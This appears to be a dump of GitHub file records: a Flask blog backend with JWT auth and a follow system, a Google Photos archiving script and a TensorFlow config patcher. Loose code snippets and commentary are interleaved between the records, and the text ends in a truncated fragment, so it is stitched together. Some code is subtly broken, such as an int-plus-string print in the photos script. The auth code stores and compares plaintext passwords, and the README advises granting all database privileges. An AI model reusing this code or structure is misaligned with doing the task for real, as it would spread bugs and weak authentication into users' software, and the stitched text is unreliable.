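    id = fields.Int()
    title = fields.Str()
    tags = fields.Nested(TagSchema, many=True)   # nested serialization, as above

blog = {'id': 1, 'title': 'hello', 'tags': [{'id': 1, 'name': 'flask'}]}
# marshmallow 2.x returns a MarshalResult; .data holds the serialized dict.
print(BlogSchema().dump(blog).data)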
{
"alpha_fraction": 0.6287102103233337,
"alphanum_fraction": 0.633567214012146,
"avg_line_length": 30.423728942871094,
"blob_id": "5222127c289c16fab8bbe63a13488a6e9f677d36",
"content_id": "09c470b255a017ffdf96cdb480a6eb70228ed663",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1853,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 59,
"path": "/app/models.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from app import db\nfrom datetime import datetime\n\nfollows = db.Table(\n 'follows',\n db.Column('follower_id', db.Integer, db.ForeignKey('user.id'), primary_key=True),\n db.Column('following_id', db.Integer, db.ForeignKey('user.id'), primary_key=True)\n)\n\nclass User(db.Model):\n __tablename__ = 'user'\n\n id = db.Column(db.Integer, primary_key = True)\n username = db.Column(db.String(80), unique=True, nullable=False)\n password = db.Column(db.String(200), nullable=False)\n blogs = db.relationship('Blog', backref=\"user\", lazy=True)\n followers = db.relationship(\n 'User',\n secondary=\"follows\",\n primaryjoin=\"User.id==follows.c.following_id\",\n secondaryjoin=\"User.id==follows.c.follower_id\",\n backref=\"followings\"\n )\n\n def __repr__(self):\n return '<User %r>' % self.username\n\ntags = db.Table(\n 'tags',\n db.Column('tag_id', db.Integer, db.ForeignKey('tag.id'), primary_key=True),\n db.Column('blog_id', db.Integer, db.ForeignKey('blog.id'), primary_key=True),\n)\n\nclass Blog(db.Model):\n __tablename__ = 'blog'\n\n id = db.Column(db.Integer, primary_key = True)\n title = db.Column(db.String(50), nullable=False)\n content = db.Column(db.Text, nullable=False)\n created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)\n updated_at = db.Column(\n db.DateTime,\n default=datetime.utcnow,\n nullable=False,\n onupdate=datetime.utcnow\n )\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n tags = db.relationship(\n 'Tag',\n secondary=tags,\n lazy='subquery',\n backref=db.backref('blogs', lazy=True)\n )\n\nclass Tag(db.Model):\n __tablename__ = 'tag'\n\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(10), nullable=False, unique=True)"
},
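The self-referential follows table above is the subtle part of the model; a standalone sketch that mirrors it with plain SQLAlchemy (1.2, as pinned in requirements.txt) and an in-memory SQLite database, so the follower/following semantics can be exercised without the app:

from sqlalchemy import Column, ForeignKey, Integer, String, Table, create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship, sessionmaker

Base = declarative_base()

follows = Table(
    'follows', Base.metadata,
    Column('follower_id', Integer, ForeignKey('user.id'), primary_key=True),
    Column('following_id', Integer, ForeignKey('user.id'), primary_key=True))

class User(Base):
    __tablename__ = 'user'
    id = Column(Integer, primary_key=True)
    username = Column(String(80), unique=True)
    followers = relationship(
        'User', secondary=follows,
        primaryjoin=id == follows.c.following_id,
        secondaryjoin=id == follows.c.follower_id,
        backref='followings')

engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()

alice, bob = User(username='alice'), User(username='bob')
alice.followers.append(bob)        # bob follows alice
session.add_all([alice, bob])
session.commit()
print([u.username for u in bob.followings])  # ['alice']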
{
"alpha_fraction": 0.6013590097427368,
"alphanum_fraction": 0.6090034246444702,
"avg_line_length": 33.20388412475586,
"blob_id": "46b1cfe3bb92de903764be8d537ba1460d15cd65",
"content_id": "35b211410e4daa33455d2701220dda1116418fb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3532,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 103,
"path": "/app/views/blog.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from flask import request, jsonify, Blueprint\nfrom app import db\nfrom app.models import Blog, User, Tag\nfrom flask_restful import Resource, Api, reqparse, abort\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom sqlalchemy import and_\nfrom app.marshmallow import BlogSchema\n\nbp_blog = Blueprint('blog', __name__)\napi = Api(bp_blog)\nblog_schema = BlogSchema()\n\nclass BlogPost(Resource):\n @jwt_required\n def post(self):\n current_user = get_jwt_identity()\n user = User.query.filter(User.username==current_user).first()\n parser = reqparse.RequestParser()\n parser.add_argument('title', required=True, help=\"title can't be blank\")\n parser.add_argument('content', required=True, help=\"content can't be blank\")\n parser.add_argument('tags', required=False, action=\"append\")\n args = parser.parse_args()\n title = args['title']\n content = args['content']\n tags = args['tags']\n blog = Blog(title=title, content=content, user_id=user.id)\n for item in tags:\n tag = Tag(name=item)\n blog.tags.append(tag)\n db.session.add(blog)\n db.session.commit()\n return jsonify({ 'success': True })\n\nclass BlogGetPutDelete(Resource):\n @jwt_required\n def get(self, blog_id):\n current_user = get_jwt_identity()\n user = User.query.filter(User.username==current_user).first()\n user_id = user.id\n blog = Blog.query.filter(\n and_(\n Blog.id == blog_id,\n Blog.user_id == user_id\n )\n ).first()\n if not blog:\n abort(404, message='blog not exist')\n\n result = blog_schema.dump(blog).data\n return result\n\n @jwt_required\n def delete(self, blog_id):\n current_user = get_jwt_identity()\n user = User.query.filter(User.username==current_user).first()\n user_id = user.id\n blog = Blog.query.get(blog_id)\n if not blog:\n abort(404, message=\"blog not exist\")\n if blog.user_id != user_id:\n abort(401, message=\"you dont have authorization\")\n db.session.delete(blog)\n db.session.commit()\n return { 'success': True }, 200\n\n @jwt_required\n def put(self, blog_id):\n current_user = get_jwt_identity()\n user = User.query.filter(User.username==current_user).first()\n user_id = user.id\n blog = Blog.query.get(blog_id)\n if not blog:\n abort(404, message=\"blog not exist\")\n if blog.user_id != user_id:\n abort(401, message=\"you dont have authorization\")\n\n parser = reqparse.RequestParser()\n parser.add_argument('title')\n parser.add_argument('content')\n args = parser.parse_args()\n blog.title = args['title'] or blog.title\n blog.content = args['content'] or blog.content\n\n db.session.add(blog)\n db.session.commit()\n return { 'success': True }, 200\n\nclass BlogList(Resource):\n @jwt_required\n def get(self):\n blogs = Blog.query.all()\n return blog_schema.dump(blogs, many=True).data, 200\n\nclass BlogWithUser(Resource):\n @jwt_required\n def get(self, user_id):\n blogs = Blog.query.filter(Blog.user_id == user_id).all()\n return blog_schema.dump(blogs, many=True).data, 200\n\napi.add_resource(BlogPost, '/blog')\napi.add_resource(BlogGetPutDelete, '/blog/<int:blog_id>')\napi.add_resource(BlogList, '/blogs')\napi.add_resource(BlogWithUser, '/blogs/<int:user_id>')\n\n\n\n \n\n"
},
{
"alpha_fraction": 0.6278245449066162,
"alphanum_fraction": 0.645990252494812,
"avg_line_length": 32.19117736816406,
"blob_id": "34b42882dab1799c8d0eba6cd955c91f0ac6271e",
"content_id": "7542cdcbdad13257337232087d04eafd1cb74201",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2257,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 68,
"path": "/migrations/versions/cd9205e1a4ad_.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "\"\"\"empty message\n\nRevision ID: cd9205e1a4ad\nRevises: \nCreate Date: 2018-09-14 14:20:10.578961\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'cd9205e1a4ad'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('tag',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=10), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=80), nullable=False),\n sa.Column('password', sa.String(length=200), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('username')\n )\n op.create_table('blog',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=50), nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('updated_at', sa.DateTime(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('follows',\n sa.Column('follower_id', sa.Integer(), nullable=False),\n sa.Column('following_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['follower_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['following_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('follower_id', 'following_id')\n )\n op.create_table('tags',\n sa.Column('tag_id', sa.Integer(), nullable=False),\n sa.Column('blog_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['blog_id'], ['blog.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['tag.id'], ),\n sa.PrimaryKeyConstraint('tag_id', 'blog_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('tags')\n op.drop_table('follows')\n op.drop_table('blog')\n op.drop_table('user')\n op.drop_table('tag')\n # ### end Alembic commands ###\n"
},
{
"alpha_fraction": 0.6991474032402039,
"alphanum_fraction": 0.6991474032402039,
"avg_line_length": 20.05128288269043,
"blob_id": "75b745ee5697d928bde6ac9325e07561d922f56a",
"content_id": "7ed4bdd3d6f26a71dbaeedbca14e3b2999270428",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 821,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 39,
"path": "/app/__init__.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask_cors import CORS\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_jwt_extended import JWTManager\nfrom flask_marshmallow import Marshmallow\n\ndb = SQLAlchemy()\nma = Marshmallow()\n\ndef create_app(config):\n app = Flask(__name__)\n\n app.config.from_object(config)\n\n db.init_app(app)\n\n Migrate(app, db)\n\n JWTManager(app)\n\n ma.init_app(app)\n\n CORS(app)\n\n @app.route('/')\n def hello():\n return 'hello world'\n\n from app.auth import bp_auth\n from app.views.user import bp_user\n from app.views.blog import bp_blog\n from app.views.follow import bp_follow\n app.register_blueprint(bp_auth)\n app.register_blueprint(bp_user)\n app.register_blueprint(bp_blog)\n app.register_blueprint(bp_follow)\n\n return app\n"
},
{
"alpha_fraction": 0.6122743487358093,
"alphanum_fraction": 0.6231046915054321,
"avg_line_length": 30.477272033691406,
"blob_id": "7bbbe675ce925394a2f1a9d97c8a42fe58294a2e",
"content_id": "ba1d5f6d4e07f106359b7f2758a311efdae4ba5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1385,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 44,
"path": "/app/auth.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from flask_jwt_extended import create_access_token, get_jwt_identity, jwt_required\nfrom flask_restful import abort, Api, Resource\nfrom sqlalchemy import and_\nfrom app.logger import config_logger\nfrom flask import jsonify, request, Blueprint\nfrom app.models import User\n\nbp_auth = Blueprint('auth', __name__)\napi = Api(bp_auth)\nlogger = config_logger(__name__, 'info', 'user.log')\n\nclass Auth(Resource):\n def post(self):\n username = request.form.get('username', None)\n password = request.form.get('password', None)\n\n if not username:\n abort(400, message=\"Missing username parameter\")\n if not password:\n abort(400, message=\"Missing password parameter\")\n\n user = User.query.filter(\n and_(\n User.username == username,\n User.password == password\n )\n ).first()\n\n if not user:\n logger.warning('user not exist')\n abort(404, message=\"User not exist\")\n\n access_token = create_access_token(identity=username)\n logger.info('login success')\n return { 'access_token': access_token }, 200\n\n @jwt_required\n def get(self):\n # Access the identity of the current user with get_jwt_identity\n current_user = get_jwt_identity()\n return { \"logged_in_as\" : current_user }, 200\n\n\napi.add_resource(Auth, '/auth')\n"
},
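For reference, this is how a client would exercise the /auth resource above; the host, port, and credentials are placeholders, and `requests` is not one of this repo's dependencies.

```python
import requests

BASE = 'http://localhost:5000'  # assumed host:port

# POST form-encoded fields, matching request.form.get() on the server.
resp = requests.post(BASE + '/auth', data={'username': 'alice', 'password': 'secret'})
token = resp.json()['access_token']

# flask_jwt_extended's default header scheme is `Authorization: Bearer <token>`.
whoami = requests.get(BASE + '/auth', headers={'Authorization': 'Bearer ' + token})
print(whoami.json())  # -> {'logged_in_as': 'alice'}
```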
{
"alpha_fraction": 0.7767441868782043,
"alphanum_fraction": 0.8179401755332947,
"avg_line_length": 32.46666717529297,
"blob_id": "d7e41c6baa297103eb5019680e52ef93d4b30dd3",
"content_id": "67fc5286ecbe57a26701644bea9eb8850e1d2c0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2627,
"license_type": "no_license",
"max_line_length": 278,
"num_lines": 45,
"path": "/README.md",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "# A SIMPLE APP BACKEND\n\n*获取代码*\ngit clone https://github.com/akamuinsaner/memo_backend.git\n\n## docker本地镜像启动\n\n*本地构建docker镜像*\nsudo docker build -t memo-backend .\n\n*启动容器*\nsudo docker run -p 5000:8989 memo-backend\n\n## 本地启动\n\n*安装虚拟环境*\npython3 -m venv .env\n\n*进入虚拟环境*\n. .env/bin/activate\n\n*安装flask插件*\npip3 install -r requirement.txt\n\n*运行项目*\npython3 run.py runserver\n\n## 2018-09-06更新\n使用mysql数据库: \n1.pip3 install pymysql; \n2.更新数据库时出现`access denied`的问题,使用root用户登录数据库执行`grant all on *.* to 'user'@'host' `\n\n## 2018-09-09更新\ndocker-compose \n使用docker-compose构建mysql镜像,构建好之后使用postman发起请求报错数据库无法连接,发现是对docker-compose理解没有到位 \n1.docker-compose在构建镜像之前会创建一个虚拟网络,通过这层网络把镜像与主机隔离开,然后在这层虚拟网络中构建镜像,所以在app中配置数据库的ip地址时不能使用127.0.0.0或者localhost,还好docker compose提供了通过服务名称来获取ip地址的功能,可以在docker compose中使用设置的服务名称来充当数据库的ip地址 \n2.在docker compose中存在host_port和container_port两个概念,当在compose.yml文件中定义了`ports -\"5000:8989\"`时,8989就是container_port,5000就是host_port,container_port可以提供在服务之间的端口访问,而在虚拟网络外部访问服务时需要用host_port。犯的一个错误就是在app中配置数据库端口号时使用了host_port,由于app和db两个服务是在compose创建的虚拟网络内部进行通信的,所以需要使用container_port \n文档地址:[docker-compose networking](https://docs.docker.com/compose/networking/)\n\n## 2018-09-14更新\n*遇到问题* 使用db migrate进行数据库迁移失败 \n*原因* 由于没有在docker-compose内做映射,进入容器后执行db migrate进行数据库迁移后导致数据库版本发生变化,而本地代码迁移脚本版本没有发生变化,误操作使得本地迁移脚本版本与数据库版本不对应,所以更新失败 \n*解决方法* 删除数据库以及当前migration文件,重新执行migration(开发环境下) \n\n使用docker volume,使镜像内文件与本地文件形成映射,更改任意一方另一方即会发生变化,便于数据库数据持久化,也便于本地代码调试,无需每次更改代码都重新构建镜像,只有更改docker-compose文件或者数据库model时需要重新构建镜像"
},
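The 2018-09-09 notes boil down to one configuration line: inside the compose network, the database host is the compose service name and the port is the container port. A sketch of what that looks like in a Flask config; the service name `db`, the credentials, and the database name are all placeholders.

```python
class DockerConfig:
    # `db` is the docker-compose service name, resolved inside the compose
    # network; 3306 is MySQL's *container* port, not a host-mapped port.
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://memo:memo_pass@db:3306/memo'
    SQLALCHEMY_TRACK_MODIFICATIONS = False
```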
{
"alpha_fraction": 0.5099236369132996,
"alphanum_fraction": 0.7022900581359863,
"avg_line_length": 16.70270347595215,
"blob_id": "9135223bcc9b25bdfb0a7baa31e0dd6d8832154d",
"content_id": "f9dc944cabe951dc612857d5e085ae6f92d70ee2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 37,
"path": "/requirements.txt",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "alembic==1.0.0\naniso8601==3.0.2\nastroid==2.0.4\nautopep8==1.3.5\nclick==6.7\nFlask==1.0.2\nFlask-Cors==3.0.6\nFlask-JWT==0.3.2\nFlask-JWT-Extended==3.12.1\nFlask-Migrate==2.2.1\nFlask-RESTful==0.3.6\nFlask-Script==2.0.6\nFlask-SQLAlchemy==2.3.2\nisort==4.3.4\nitsdangerous==0.24\nJinja2==2.10\nlazy-object-proxy==1.3.1\nMako==1.0.7\nMarkupSafe==1.0\nmccabe==0.6.1\npycodestyle==2.4.0\nPyJWT==1.4.2\npylint==2.1.1\npython-dateutil==2.7.3\npython-editor==1.0.3\npytz==2018.5\nplumbum==1.6.7\nsix==1.11.0\nSQLAlchemy==1.2.10\ntyped-ast==1.1.0\nWerkzeug==0.14.1\nwrapt==1.10.11\nmarshmallow-sqlalchemy==0.14.1\nflask-marshmallow==0.9.0\nmarshmallow==2.15.4\nPyMySQL==0.9.2\nsetuptools==39.0.1\n"
},
{
"alpha_fraction": 0.6274900436401367,
"alphanum_fraction": 0.6322709321975708,
"avg_line_length": 35.911766052246094,
"blob_id": "b2a5d28d91ac404e90b247d052f984eaf32698a2",
"content_id": "61c06d5798cbfee8685f7ed6b8de183047d65345",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2510,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 68,
"path": "/app/views/follow.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from app.models import User\nfrom flask import request, jsonify, Blueprint\nfrom app import db\nfrom flask_restful import Resource, Api, reqparse, abort\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom app.marshmallow import SimpleUserSchema\n\nbp_follow = Blueprint('follow', __name__)\napi = Api(bp_follow)\nusers_schema = SimpleUserSchema(many=True)\n\nclass FollowerList(Resource):\n @jwt_required\n def get(self, user_id):\n user = User.query.filter(User.id == user_id).first()\n if not user:\n abort(404, message=\"user not exist\")\n return users_schema.dump(user.followers).data\n\nclass FollowingList(Resource):\n @jwt_required\n def get(self, user_id):\n user = User.query.filter(User.id == user_id).first()\n if not user:\n abort(404, message=\"user not exist\")\n return users_schema.dump(user.followings).data\n\nclass Follow(Resource):\n @jwt_required\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('user_ids', required=True, action=\"append\", help=\"user_ids is required\")\n current_user = get_jwt_identity()\n user = User.query.filter(User.username == current_user).first()\n if not user:\n abort(404, message=\"user not exist\")\n args = parser.parse_args()\n user_ids = args[\"user_ids\"]\n for user_id in user_ids:\n following = User.query.get(user_id)\n if following not in user.followings:\n user.followings.append(following)\n db.session.add(user)\n db.session.commit()\n return { \"success\": True }\n \n @jwt_required\n def delete(self):\n parser = reqparse.RequestParser()\n parser.add_argument('user_ids', required=True, action=\"append\", help=\"user_ids is required\")\n current_user = get_jwt_identity()\n user = User.query.filter(User.username == current_user).first()\n if not user:\n abort(404, message=\"user not exist\")\n args = parser.parse_args()\n user_ids = args[\"user_ids\"]\n for user_id in user_ids:\n following = User.query.get(user_id)\n if following in user.followings:\n user.followings.remove(following)\n db.session.add(user)\n db.session.commit()\n return { \"success\": True }\n \n\napi.add_resource(FollowerList, '/user/<int:user_id>/followers')\napi.add_resource(FollowingList, '/user/<int:user_id>/followings')\napi.add_resource(Follow, '/follow')\n"
},
{
"alpha_fraction": 0.6521739363670349,
"alphanum_fraction": 0.6859903335571289,
"avg_line_length": 13.714285850524902,
"blob_id": "fe9d699dca6a69ea8ada13ebd40c67395be3c3d3",
"content_id": "6bb8ae94d39790128b7e44658befd207442f4de7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 207,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 14,
"path": "/Dockerfile",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "FROM python:3.6.3\n\nCOPY . /docker/app\n\nWORKDIR /docker/app\n\nENV FLASK_ENV=development\n\nRUN pip install --upgrade pip && \\\n pip install -r requirements.txt\n\nEXPOSE 8989\n\nCMD [\"python\", \"start.py\", \"run\"]\n\n"
},
{
"alpha_fraction": 0.6612411141395569,
"alphanum_fraction": 0.6632756590843201,
"avg_line_length": 26.19444465637207,
"blob_id": "05e4f73df8d2ecded518f2e3682497d68337a61b",
"content_id": "88b736a6cd98b76d8001b5621bccc3f1a35cf226",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 983,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 36,
"path": "/app/logger.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "import os\nimport logging\n\ndef config_logger(name, level, log_file_name):\n # define log path\n log_path = './logs'\n\n # create logger\n logger = logging.getLogger(name)\n level = getattr(logging, level.upper(), logging.NOTSET)\n logger.setLevel(level)\n\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n file_path = os.path.join(log_path, log_file_name)\n\n #add file handler print log to file\n fh = logging.FileHandler(file_path)\n fh.setLevel(logging.DEBUG)\n\n #add stream handler print log to terminal\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n #set formatter\n fmt = \"%(asctime)-15s %(levelname)s %(filename)s %(lineno)d %(process)d %(message)s\"\n datefmt = \"%a %d %b %Y %H:%M:%S\"\n formatter = logging.Formatter(fmt, datefmt)\n\n # add handler and formatter to logger\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n return logger\n "
}
] | 14 |
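Usage of the config_logger helper from app/logger.py above, mirroring how auth.py calls it:

```python
from app.logger import config_logger

logger = config_logger(__name__, 'info', 'user.log')
logger.info('login success')       # written to ./logs/user.log and echoed to the terminal
logger.warning('user not exist')
```

Note that calling config_logger twice with the same name attaches duplicate handlers (logging.getLogger returns the cached logger object), so each module should call it once at import time, as the views in this repo do.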
gm2015/GooglePhotosArchiver
|
https://github.com/gm2015/GooglePhotosArchiver
|
1f3bd60fe1f5be8b8e33a4cddd410e9d147359c9
|
c3f81dfdcb4e3f6ffdd060f85ec97f275077fc69
|
1feaeb9eb311392625e20ba1ac43df8de3423e3c
|
refs/heads/master
| 2022-03-27T19:12:27.670788 | 2020-01-06T15:44:27 | 2020-01-06T15:44:27 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7704485654830933,
"alphanum_fraction": 0.7955145239830017,
"avg_line_length": 46.375,
"blob_id": "c1b954061d9173d01dc997ac5d689b28875e2ac0",
"content_id": "244a7f4c40ae96608026b5e6aa2cd57cd09346cc",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 758,
"license_type": "permissive",
"max_line_length": 234,
"num_lines": 16,
"path": "/README.md",
"repo_name": "gm2015/GooglePhotosArchiver",
"src_encoding": "UTF-8",
"text": "# Google Photos Archiver\n# How to Use\n### Needed Software:\n[Python 3](https://www.python.org/downloads/ \"Python 3\")\n**OR**\n[Win10 64bit Executable](https://github.com/NicholasDawson/GooglePhotosArchiver/raw/master/Google%20Photos%20Archiver.exe)\n\n### Needed Python Libraries:\n(Install using pip)\n- googleapiclient\n- google_auth_oauthlib\n- google\n\n## Full Instructions\n1. Install python and the necessary libraries and download this repository, or download the 64bit executable version of the application to run on windows.\n2. Follow the instructions in this [Google Slides Presentation](https://docs.google.com/presentation/d/1nrNmM6iUSPXU5C9DjxG9gyaAAFKYXuMMeQVxqBYyRMM/edit?usp=sharing \"Link\"). It is very detailed and includes screenshots for everything.\n"
},
{
"alpha_fraction": 0.649773359298706,
"alphanum_fraction": 0.653481662273407,
"avg_line_length": 33.661766052246094,
"blob_id": "349890b4f979b811e7641a97ad7c24f9e990dfb3",
"content_id": "fef97208fc44d5a28fcdcfb25a7da1f5bf763dc0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2427,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 68,
"path": "/google_photos_archiver.py",
"repo_name": "gm2015/GooglePhotosArchiver",
"src_encoding": "UTF-8",
"text": "import os\r\nfrom googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom google.auth.transport.requests import Request\r\nimport pickle\r\nfrom urllib.request import urlretrieve as download\r\n\r\n\r\n# Define Scopes for Application\r\nSCOPES = ['https://www.googleapis.com/auth/photoslibrary']\r\n\r\ndef get_service():\r\n # The file photos_token.pickle stores the user's access and refresh tokens, and is\r\n # created automatically when the authorization flow completes for the first\r\n # time.\r\n creds = None\r\n\r\n if os.path.exists('photoslibrary_token.pickle'):\r\n with open('photoslibrary_token.pickle', 'rb') as token:\r\n creds = pickle.load(token)\r\n # If there are no (valid) credentials available, let the user log in.\r\n if not creds or not creds.valid:\r\n if creds and creds.expired and creds.refresh_token:\r\n creds.refresh(Request())\r\n else:\r\n flow = InstalledAppFlow.from_client_secrets_file('credentials.json', SCOPES)\r\n creds = flow.run_local_server()\r\n # Save the credentials for the next run\r\n with open('photoslibrary_token.pickle', 'wb') as token:\r\n pickle.dump(creds, token)\r\n\r\n return build('photoslibrary', 'v1', credentials=creds)\r\n\r\ndef download_images(media_items, media_num):\r\n for x in media_items:\r\n if 'image' in x['mimeType']:\r\n url = x['baseUrl'] + '=d'\r\n else:\r\n url = x['baseUrl'] + '=dv'\r\n filename = str(media_num) + '_' + x['filename']\r\n print('Downloading ' + filename)\r\n download(url, 'Google Photos Library/' + filename)\r\n media_num += 1\r\n return media_num\r\n\r\n\r\n# Get API Service\r\nprint('Getting API Service...')\r\nservice = get_service()\r\nprint('API Service loaded.')\r\n\r\n# Find and Download Media\r\nif not os.path.exists('Google Photos Library'):\r\n os.makedirs('Google Photos Library')\r\n\r\nresults = service.mediaItems().list(pageSize=100).execute()\r\nmedia_num = download_images(results['mediaItems'], 0)\r\nnext = results['nextPageToken']\r\n\r\nwhile True:\r\n results = service.mediaItems().list(pageSize=100, pageToken=next).execute()\r\n media_num = download_images(results['mediaItems'], media_num)\r\n try:\r\n next = results['nextPageToken']\r\n except KeyError:\r\n break\r\nprint('All Media Has Been Downloaded.')\r\nprint(media_num + ' items have been downloaded.')\r\n\r\n"
}
] | 2 |
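The paging loop at the bottom of google_photos_archiver.py above can also be phrased as a generator. This sketch makes the same mediaItems().list calls, just restructured around googleapiclient's list_next helper; `service` is the object returned by get_service().

```python
def iter_media_items(service, page_size=100):
    """Yield every media item in the library, one page at a time."""
    request = service.mediaItems().list(pageSize=page_size)
    while request is not None:
        resp = request.execute()
        for item in resp.get('mediaItems', []):
            yield item
        # list_next builds the follow-up request from nextPageToken, or returns None
        request = service.mediaItems().list_next(request, resp)
```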
Muneeb-Ahmed-Khan/muneebRepo
|
https://github.com/Muneeb-Ahmed-Khan/muneebRepo
|
b4a5a4132dc0fe808c0b1debf40ec5a2b564b99e
|
c02002875b388b50d1c1395d70fedc204169312c
|
080f967bfbd3cf74cd1b508326648e44710f6cbd
|
refs/heads/master
| 2020-12-21T10:28:55.172579 | 2020-01-29T10:27:52 | 2020-01-29T10:27:52 | 236,403,050 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6893543004989624,
"alphanum_fraction": 0.724258303642273,
"avg_line_length": 94.5,
"blob_id": "7f6f25dcebefb38e45bac43e2cc46c1977402e79",
"content_id": "7ee350405beb569bb93993a6e7f56b1a5334200f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1146,
"license_type": "permissive",
"max_line_length": 201,
"num_lines": 12,
"path": "/config_edit.py",
"repo_name": "Muneeb-Ahmed-Khan/muneebRepo",
"src_encoding": "UTF-8",
"text": "import re\nfilename = 'C:/tensorflow_env/models/research/object_detection/muneebRepo/training/faster_rcnn_inception_v2_pets.config'\nwith open(filename) as f:\n s = f.read()\nwith open(filename, 'w') as f:\n s = re.sub('37', '1', s) #number of classes to train for, default was 37 so , i substituted it with 1. which is how many i am using\n s = re.sub('PATH_TO_BE_CONFIGURED/model.ckpt', '/content/models/research/object_detection/faster_rcnn_inception_v2_coco_2018_01_28/model.ckpt', s)\n s = re.sub('PATH_TO_BE_CONFIGURED/pet_faces_train.record-\\?\\?\\?\\?\\?-of-00010', '/content/models/research/object_detection/muneebRepo/train.record', s)\n s = re.sub('PATH_TO_BE_CONFIGURED/pet_faces_val.record-\\?\\?\\?\\?\\?-of-00010', '/content/models/research/object_detection/muneebRepo/test.record', s)\n s = re.sub('PATH_TO_BE_CONFIGURED/pet_label_map.pbtxt', '/content/models/research/object_detection/muneebRepo/training/label_map.pbtxt', s)\n s = re.sub('1101', '105', s) #number of test examples. number of pictures in test folder , default was 1101 . i replaced it with 105, whcih are how many pictures i am currently using in this dataset\n f.write(s)\n"
},
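The same patch can be expressed as a replacement table; the target values below are the ones hard-coded above. Like the original this sketch relies on plain re.sub over the whole file, so the word-boundary anchors only make the bare numbers ('37', '1101') slightly less likely to match something unintended.

```python
import re

REPLACEMENTS = [
    (r'\b37\b', '1'),      # num_classes: one class instead of the 37 pet classes
    (r'\b1101\b', '105'),  # num_examples: pictures in the test folder
]

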